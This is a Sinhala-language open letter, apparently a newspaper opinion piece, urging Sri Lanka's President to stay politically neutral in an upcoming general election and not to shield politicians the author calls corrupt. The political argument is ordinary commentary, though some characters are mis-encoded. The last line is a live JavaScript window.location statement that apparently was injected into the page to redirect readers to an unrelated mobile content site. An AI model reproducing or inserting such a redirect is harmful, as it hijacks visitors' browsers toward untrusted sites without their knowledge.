ජනපතිතුමනි, ස්තුතියි, දැන් ඉතින් මෙතැනින් කොතැනටද?

ජයතිලක කම්මැල්ලවීර kammalweera@gmail.com

දහ න ව වැ නි ව්‍යවස්ථා සං ශෝධනය අද තිබෙන පාර්ලි මේන්තුවේ බහුතර ඡුන්දයෙන් අනුමත කරවා ගැනීම වෙනුවෙන් ඔබ විසින් දරන ලද උත්සාහය, එ් වෙනුවෙන් ඔබ පෙන්වූ කැපවීම ගැන ප‍්‍රථමයෙන් ඔබට ස්තූති කරන්නට කැමැත්තෙමි. ඔබ ඉවසිලිවන්ත, නිහතමානී, පැසුණු නායකයකු බව මෙයින්ද රටට පෙන්වූයේය.
ජනවාරි අට වෙනිදා පැවති ජනාධිපතිවරණයෙන් ජයග‍්‍රහණය කරන්නට ඔබට හැකිවේද යන්න ගැන තිබුණු සැකසංකාවලට වැඩි සැකසංකාවක් දහනවවැනි සංශෝධනය ජය ගන්වන්නට ඔබට හැකිවේද යන්න ගැන රටේ තිබුණු බව නොරහසකි. එ් සැකය දුරු කරන්නට ඔබ සමත් විය. එහෙත් එ් සඳහා ඔබ අනුගමනය කළ ක‍්‍රමවේදය රටේ අනාගත දේශපාලන ගමන්මග කෙරෙහි, එනම් ඔබ ම ජනපතිවරණයේදී රටට පොරොන්දු වූ දිශාවට රට ගෙන යෑම කෙරෙහි අහිතකර ලෙස බලපාන්නට ඉඩ තිබෙන බව ඔබටත් රටටත් අවධාරණය කරන්නට කැමැත්තෙමු.

දහනවය සම්මත කිරීම මෙතෙක් කල් ප‍්‍රමාද කළේත්, එ් මගින් යෝජනා කෙරුණු සමහර වැදගත් කරුණු බාල කළේත් ශ‍්‍රී ලංකා නිදහස් පක්ෂය ප‍්‍රමුඛ එක්සත් ජනතා නිදහස් සන්ධානයට අයත් මන්ත‍්‍රීවරුන් බව නොරහසකි. ඔවුන්ගේ බලපෑමට නැමෙන්නට ඔබට කොතරම් සිදුවුණේද යන්න දහනවය වෙනුවට දාහත බලගැන්වීමෙන් පමණක් හෝ සෑහීමට පත්වන්නට සිදුවන බවක් ඔබගෙන් කියවීමෙන් පෙනුණි. ඔබේම පක්ෂයේ අය සමග පොරබැදීමෙන් ඔබ වෙහෙසට පත්ව සිටි බව අපි දුටුවෙමු.
මහින්ද රාජපක්ෂ නායකත්වය යටතේ ශ‍්‍රී ලංකා නිදහස් පක්ෂය නැවත ගොඩ ගත නොහැකි තරමට පිරිහුණු බව අපට වඩා හොඳින් ඔබ දනී. එ් පරිහානියේ තරම ජනාධි පතිවරණ රැුස්වීම්වලදී ඔබේම මුවින් අපි ඇසුවෙමු. එ් පක්ෂයේ මන්තී‍්‍රවරුන් ලෙස වත්මන් පාර්ලිමේන්තුවේ සිටින බහුතරයක් දහනවය කඩාකප්පල් කරන්නට දැරූ පිළිකුල්සහගත වියරු උත්සාහය මගින් එය හොඳින් ප‍්‍රදර්ශනය කෙරිණි. අවසානයේදී ඔවුන් පස්සට ගියත් එසේ ගියේ ජනපතිවරණයේදී සහ ඉන්පසුව රටට දුන් පොරොන්දුවලින්, එ් පොරොන්දුවලට පදනම් වූ ප‍්‍රතිපත්තිවලින් ඔබ පසෙකට ඇදගැනීමෙන් පසුව බවය අපට පෙනෙන්නේ. රටට විනකටින දූෂිතයන් රැුළක් ඉදිරි මහමැතිවරණයෙන් යළිත් පාර්ලිමේන්තුවට පත්කර ගැනීමට ඔබේ සහයෝගය පොරොන්දු කරවා ගන්නට ඔවුන් සමත් වූ බව පෙනේ. ඔවුන්ගේ බලපෑමට නතුවී, ¥ෂණ වංචා සම්බන්ධයෙන් කෙරීගෙන යන පරීක්ෂණ නවතා දැමීමට හෝ බාල කිරීමට ඔබ ඔවුන්ට පොරොන්දු වූයේද යන්න ගැනද සාධාරණ සැකයක් දැන් ඉස්මත්තට පැමිණ තිබේ. එසේ වන්නේ නම් දහනවය සම්මත කර ගැනීමෙන් පලක් නොවනු ඇත.

අල්ලස් හෝ ¥ෂණ කොමිසමේ අධ්‍යක්ෂ ජනරාල්වරියට විරුද්ධවත් මූල්‍ය වංචා සම්බන්ධයෙන් පරීක්ෂණ පවත්වන පොලිස් එ්කකයට විරුද්ධවත් මේ මන්තී‍්‍ර කණ්ඩායම ඔබට විශාල බලපෑමක් කරමින් සිටිති. එ් අතර ඔබ එක්සත් ජනතා නිදහස් සන්ධානයේත් ශී‍්‍ර ලංකා නිදහස් පක්ෂයේත් නායකත්වය බාර ගෙන ඉදිරි මහ මැතිවරණයේදී එහි ජයග‍්‍රහණය වෙනුවෙන් කැපවන බවට පොරොන්දු දෙමින් සිටී.

ඔබේ එ් ප‍්‍රකාශ ජනපතිවරණයේදී ඔබට ලැබුණු ජනවරමට පටහැණිය. ඔබ රටේ ජනාධිපතිවරයා හැටියට නිර්පාක්ෂික වන බවටත් ඔබ බලයට පත්කළ එක්සත් ජාතික පාක්ෂිකයන් ද ඇතුළු ජනතාවට විරුද්ධ නොවන බවටත් ජයග‍්‍රහණයත් සමග ඔබ දුන් පොරොන්දුවලට පටහැණිය. අඩුම වශයෙන් ඉදිරි වසර දෙකකටවත් ජාතික ආණුඩුවක් හදන බවට ඔබ කළ ප‍්‍රකාශයට එය පටහැණිය.

ඉදිරි මහ මැතිවරණයේදී ඔබ එක්සත් ජනතා නිදහස් සන්ධානයේ හෝ ශ‍්‍රී ලංකා නිදහස් පක්ෂයේ ජයග‍්‍රහණය වෙනුවෙන් පෙනී සිටින්නේ යයි කීම ජනපතිවරණයේදී ඔබට ඡුන්දය ප‍්‍රකාශ කළ ජනයාට විරුද්ධව යෑමකි. ඔබ ජනාධිපතිවරණයේදී පොදු අපේක්ෂකයා ලෙස ඉදිරිපත් වූයේ ඔබේත් ඔබේ දරුවන් සහ පවුලේ අයගේත් ජීවිත පරදුවට තබා බව ඇත්තය. ඒකාධිපති වියරුවෙන් පෙළුණු, වැඩවසම්වාදී, වර්ගවාදී රාජපක්ෂ පාලනයට විරුද්ධව පොදු අපේක්ෂකයකු සොයමින් සිටි ජනතාවට නායකත්වය දෙන්නට ඉදිරිපත් වෙමින් ඔබ කළ එ් ශ්‍රේෂ්ඨ පරිත්‍යාගය අපි ඊට නිසි පූර්ණ ගෞරවය සහිතව අගය කරමු. එ සේ ම ඡුන්ද රැුස්වීම්වලට වෙඩිතබද්දී, මිනීමරද්දී, භීෂණයට, අල්ලසට, යට නොවී ඔබට ජන්දය දෙන්නට ඡුන්දපොළට ගිය සෑම ඡුන්දදායකයෙකුම එය කළේ තම දිවි පරදුවට තබා බව අමතක නොකළ යුතුය. ඔබේ සලකුණ වූ හංසයා ඉදිරියේ කතිරය ගැසීමෙන් එ් ඡුන්දදායකයන් අපේක්ෂා කළේ දූෂිත රාජපක්ෂ පාලනය අවසන් කිරීමය. අප දකින්නේ එය, ඔබ දැන් නායකත්වය දෙනවා යයි කියන පක්ෂයේ සහ සන්ධානයේ පාලනයට විරුද්ධව ද දුන් ඡුන්දයක් බවය.

විධායක බලය පාවිච්චි කළ ද නොකළ ද ඔබ දැන් මේ රටේ ජනාධිපතිවරයාය. රාජ්‍යයේ නායකයාය. ආණ්ඩුවේද නායකයාය. එ් අනුව මහමැතිවරණයකදී රටේ ජනාධිපතිවරයාගේ ප‍්‍රතිරූපයට විශේෂ බලයක් ඇති බව ප‍්‍රතික්ෂේප කළ නොහැකිය. එ සේ ම එක පක්ෂයක් හෝ සන්ධානයක් වෙනුවෙන් එ් ජනාධිපති වරයා මැදිහත් වන විට අපක්ෂපාතීව කි‍්‍රයා කි‍්‍රයාකිරීම ගැන දෙවරක් සිතන්නට රාජ්‍ය නිලධාරීන්ට, පොලීසියට සිදුවෙයි. රාජ්‍ය මාධ්‍යයට සේම අනෙකුත් මාධ්‍ය ආයතනවලටද රටේ ජනාධිපතිවරයාගේ අදහස්වලට වැඩි ඉඩක් දෙන්නට සිදුවෙයි. එ් සියල්ලටම වඩා ‘බලය තියෙන්නෙ ජනාධිපති අතේනෙ. ඉතින් අපිට එකට විරුද්ධ වෙන්න බෑනෙ’ යනුවෙන් සාමාන්‍ය ජන මනසෙහි ඇති වන හැඟීම එක් පැත්තකට වාසි සහගත වීම වැළැක්විය නොහැකිය.

ජේ ආර්, චන්ද්‍රිකා, මහින්ද කළ දේ අපි ඔබ ගෙන් අපේක්ෂා නොකරමු. ඔබ එසේ නොවන බව දැනට ඔප්පු කර තිබේ. කරුණාකර එය ඉදිරි මහ මැතිවරණයේ දීත් පෙන්වන්න. කරුණාකර නිර්පාක්ෂික වන්න.
ශ‍්‍රී ලංකා නිදහස් පක්ෂයේ ගම් මට්ටමේ සාමාන්‍ය පාක්ෂිකයන් හෝ ආධාරකරුවන් එය තවමත් ප‍්‍රගතිශීලී පක්ෂයක් යයි අදහනවා විය හැකිය. එහෙත් එහි තීරණ ගන්නා මැති ඇමතීන් සහ ආසන සංවිධායකයන් අතිබහුතරය රට ගැන නොව තම බඩ ගැන සිතන අය බව ඔබේ ප‍්‍රතිරූපයට මුවා කර සඟවන්නට බැරිය. රාජපක්ෂ නායකත්වය ඔස්සේ එක්සත් ජනතා නිදහස් සන්ධානයත් ශ‍්‍රී ලංකා නිදහස් පක්ෂයත් හරහා එතනෝල් කාරයන්ගෙන්, කුඩුකාර යන්ගෙන් පාර්ලි මේන්තුවට පැමිණ සිටින බව ඔබම ජනපතිවරණයේදී රටට කී බව නැවත නැවත මතක්කර දෙන්නෙමු. රටේ ජනතාව විසින් කුඩු ව්‍යාපාරිකයන්, එතනෝල්කාරයන්, දූෂිතයන් ලෙස නම්කරනු ලැබ සිටින්නන් ද දැන් ඔබේ අතින් ආසන සංවිධායක තනතුරු ලබනු දකින්නට ලැබෙන විට අපට නම් දැනෙන්නේ හිරිකිතයකි.

මට මොන තරම් අපහාස කළත්, මා පරාජය කරන්නට කොතරම් උත්සාහ කළත් මම එ් කිසිවකු කෙරෙහි වෛර නැත්තෙමි. මෛති‍්‍රයෙන් ම ඔවුන්ට සලකමි’ මේ ඔබේ ප‍්‍රතිපත්තිය බව පෙනේ. එය වටින්නේය. ඔබේ ප‍්‍රතිරූපය එයින් ඔප වැටෙන්නේය. එහෙත් ජනාධිපතිතුමනි, ඔබේ මෛත‍්‍රියෙන් නැවත වරක් මහාපරිමාණ ¥ෂිතයන් කුඩු ව්‍යාපාරිකයන් එතනෝල්කාරයන්, මහජන දේපළ ගසා කෑ හොරුන්, දූෂිතයන් යළිත් මැති ඇමතින් බවට පත් වන්නේ නම් එයට ඉඩදී මෛති‍්‍රය වඩන්නට සිවිල් පුරවැසියන් වන අපට නම් නොහැකිය.

පවතින ආණ්ඩුව වඩා හොද බවක් එයින් අදහස් නොකෙරෙන බව ද මෙතැනදී අවධාරණයෙන් කිව යුතුවෙයි. මහ පරිමාණ දූෂණ වංචා නාස්ති අනුමත කරමින්, එ්කාධිපති පාලකයකු හදාගෙන ඔහුට කීකරුව සිටි, දැන් ඔබ නායකත්වය දෙනවා යයි කියන පක්ෂයේ සහ සන්ධානයේ මන්තී‍්‍රවරුන් වළිකන්නේ නිමල් සිරිපාල වෙනුවට දිනේෂ් ගුණවර්ධන ඉස්සරහට ගෙන පවතින පාර්ලිමේන්තුවම යළිත් අටවා ගන්නටය. එ් මගින් පසුගිය දූෂිත පාලනය ම නැවත ගෙන යන්නටය. මේ ප‍්‍රයත්නයට ඔබේ ප‍්‍රතිරූපය උදව් දෙන්නේ නම් එය රටට කරන ද්‍රෝහිකමක් නොවන්නේද? පසුගිය මාස තුනම ඔවුන් උපායන් යෙදුවේ අගමැති සහ ජනාධිපති අතර ගැටුමක්, දුරස්ථභාවයක් ඇති කරන්නටය. එය යම් තරමකට ඉටු වී ඇත්ද යන සැකයද අපට තිබේ. ඔවුන්ට අවශ්‍ය වන්නේ ඔබේ බලය බිඳින්නට මහින්ද රාජපක්ෂ අගමැති කරවා ගන්නටය. මහින්දත් එකතු කරගෙන මහමැතිවරණයෙන් පක්ෂයත් සන්ධානයත් දිනවනවා යයි ඔබත් දැන් කියන විට රාජපක්ෂ පාලනය අවසන් කරන්නට පෙරට ආ ජනතාවට කුමක් සිතෙනු ඇත්දැයි සිතා බලන්න.

තවත් එක් කරුණක් අවධාරණය කරනු කැමැත්තෙමි. දැන් රටේ බලපවත්වන ආණ්ඩුක‍්‍රම ව්‍යවස්ථාවට අනුව ඔබ ජාතික සමගියේ සංකේතය වන්නේය. ඔබේ නායකත්වය යටතේ ඇති සන්ධානයේ සමහරුන් බලයට එ්ම වෙනුවෙන් මේ රටේ වර්ගවාදය, ආගම්වාදය අවුස්සන බව නොරහසකි. රාජපක්ෂලා බේරාගන්නට පාරට බසින ඔබේම පක්ෂයේ අය ජාතිවාදීන් විසින් විකෘති කළ ජාතික කොඩිය ඔසවා ගෙන යති. දැන් ඔවුන් කියන්නේ එය ඉතිහාසයේ සිංහල කොඩිය ලෙස භාවිත කළ බවයි. එ් අනුව මොවුන් රට ගෙන යන්නට හදන්නේ ආ පස්සටය. ගෝත‍්‍ර වාදයටය. රාජපක්ෂලා රකින්නට ගෝත‍්‍රවාදය බෙහෙවින් උචිත වන නමුත් ජාතික සමගියට එය කිසිසේත්ම උචිත නොවනවා පමණක් නොව පරම හතුරුය. එ් හෙයින් ශී‍්‍ර ලංකා නිදහස් පක්ෂය හෝ වෙනත් පක්ෂයක් ගොඩ ගැනීම දෙවනුවට තබා මේ ජාතික සමගිය සංහිඳියාව ගොඩනැගීමට ප‍්‍රමුඛත්වය දෙන්න.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;